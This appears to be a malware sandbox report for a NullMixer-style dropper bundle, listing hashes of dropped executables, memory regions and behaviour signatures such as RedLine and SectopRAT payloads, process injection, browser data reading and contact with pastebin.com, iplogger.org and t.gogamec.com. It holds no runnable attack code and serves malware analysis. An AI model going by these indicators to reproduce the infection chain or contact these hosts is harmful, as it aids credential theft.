| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/2352-183-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1964-182-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2160-181-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1528-193-0x0000000000390000-0x0000000000400000-memory.dmp
memory/1320-192-0x0000000000020000-0x0000000000092000-memory.dmp
memory/2436-191-0x0000000000F00000-0x0000000000F70000-memory.dmp
memory/2964-149-0x0000000001200000-0x0000000001208000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QURGKV1BLVSU6TPY56V.temp
| MD5 | d54a06bc432f97ef572d5736b224ccd4 |
| SHA1 | 498ba77b33bad2fa6148080e4b0fb334381348d1 |
| SHA256 | 2093a640c33ad1575985fafafeabae46c1da8b905aa341d125da8f70069b7d5a |
| SHA512 | bc883edc62b2daec082dfd58d72fc2cc3b3b45e92343d2c8f721f0dc69aa991640a55bad96c7eb810268469f93cf07bda02cc94333a9088ad0f48fc084dfd679 |
memory/2796-196-0x00000000002C0000-0x00000000002D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/1964-121-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe
| MD5 | 8b6f3a6e8d9797093a78f0b85da4a1fc |
| SHA1 | 2f8346a3ec3427c5a7681d166501f8f42f620b3b |
| SHA256 | 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8 |
| SHA512 | c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
memory/2796-208-0x0000000000750000-0x0000000000756000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
memory/844-209-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/2072-225-0x00000000026D0000-0x00000000028C0000-memory.dmp
memory/2752-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-83-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-82-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-81-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2752-69-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/1704-236-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-251-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-249-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-248-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-247-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2536-245-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-243-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-241-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-238-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-235-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2752-260-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-259-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-258-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2752-256-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2752-253-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2752-252-0x0000000000400000-0x000000000051C000-memory.dmp
memory/1704-234-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1704-232-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-230-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-228-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-226-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-270-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-273-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-271-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-269-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1544-267-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-265-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-263-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2260-287-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/2352-289-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1092-288-0x0000000000400000-0x0000000002F22000-memory.dmp
memory/2328-290-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2072-297-0x0000000002BD0000-0x0000000002C75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab620D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
72s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2864 set thread context of 4232 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe |
| PID 1628 set thread context of 4172 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe | N/A |
